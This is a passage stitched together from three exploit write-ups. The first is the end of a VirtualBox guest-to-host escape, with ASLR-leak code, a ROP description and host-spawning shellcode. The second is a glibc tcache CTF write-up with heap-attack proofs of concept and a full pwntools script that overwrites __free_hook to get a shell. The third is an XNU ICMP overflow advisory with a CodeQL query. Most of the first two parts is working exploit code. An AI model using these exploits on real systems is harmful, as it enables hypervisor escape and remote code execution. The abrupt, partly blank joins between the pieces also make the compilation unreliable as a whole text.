It seems there is a pointer to a string placed at a fixed offset from VBoxDD.so image base. The pointer lies at 0x58 offset at the end of ACPIState. We can read that pointer byte-by-byte using the primitives and finally obtain VBoxDD.so image base. We just hope that data past ACPIState structure is not random on each virtual machine boot. Hopefully, it isn’t; the pointer at 0x58 offset is always there.

Information Leak

Now we combine write and read primitives and exploit them to bypass ASLR. We will overflow the heap overwriting EEPROM93C46 structure, then trigger EEPROM finite automaton to write the index to ACPIState structure, and then execute INB(0x4107) in the guest to access ACPI to read one byte of the pointer. Repeat those 8 times incrementing the index by 1.

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

It has been said that in order for the integer underflow not to lead to the stack buffer overflow, certain E1000 registers should been configured. The idea is that the buffer is being overflowed in e1kHandleRxPacket function which is called while handling Tx descriptors in the loopback mode. Indeed, in the loopback mode the guest sends network packets to itself so they are received right after being sent. We disable this mode so e1kHandleRxPacket is unreachable.

DEP Bypass

We have bypassed ASLR. Now the loopback mode can be enabled and the stack buffer overflow can be triggered.

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

For now, when the last instruction of e1kHandleRxPacket is executed the saved return address is overwritten and control is transferred anywhere the attacker wants. But DEP is still there. It is bypassed in a classical way of building a ROP chain. ROP gadgets allocate executable memory, copy a shellcode loader into and execute it.

Shellcode

The shellcode loader is trivial. It copies the beginning of the overflowing buffer next to it.

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

The shellcode is executed. Its first part is:

use64

start:
    ; sys_fork
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It does fork and execve to create /usr/bin/xterm process. The attacker gains control over the host’s ring 3.

Process Continuation

I believe every exploit should be finished. It means it should not crash an application, though it’s not always possible, of course. We need the virtual machine to continue execution which is achieved by the second part of shellcode.

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called a callstack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

We’ll jump right to e1kR3NetworkDown_XmitPending which does nothing more and returns to a hypervisor function.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode adds 0x48 to RBP to make it as it should be in e1kR3NetworkDown_XmitPending. Next, the registers RBX, R12, R13, R14, R15 are taken from stack because it’s required by System V ABI to preserve it in a callee function. If they aren’t the hypervisor will crash because of invalid pointers in them.

It could be enough because the virtual machine isn’t crashes anymore and continues execute. But there will an access violation in PDMR3QueueDestroyDevice function when the VM is shutdown. The reason is that when the heap is overflowed an important structure PDMQUEUE is overwritten. Furthermore, it’s overwritten by the last two ROP gadgets i.e. the last 16 bytes. I tried to reduce the ROP chain size and failed, but when I replaced the data manually the hypervisor was still crashing. It meant the obstacle is not as obvious as seemed.

Data structure being overwritten is a linked list. Data to be overwritten is in the last second list element; a next pointer is to be overwritten. The remedy turned out to be simple:

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Getting rid of the last two elements allows the virtual machine to shut down smoothly.

Demo

https://vimeo.com/299325088

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314mtod is used to get m‘s data pointer:

icp = mtod(m, struct icmp *);

mtod is just macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size of argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do consider them to be bad query results.

Try QL on XNU

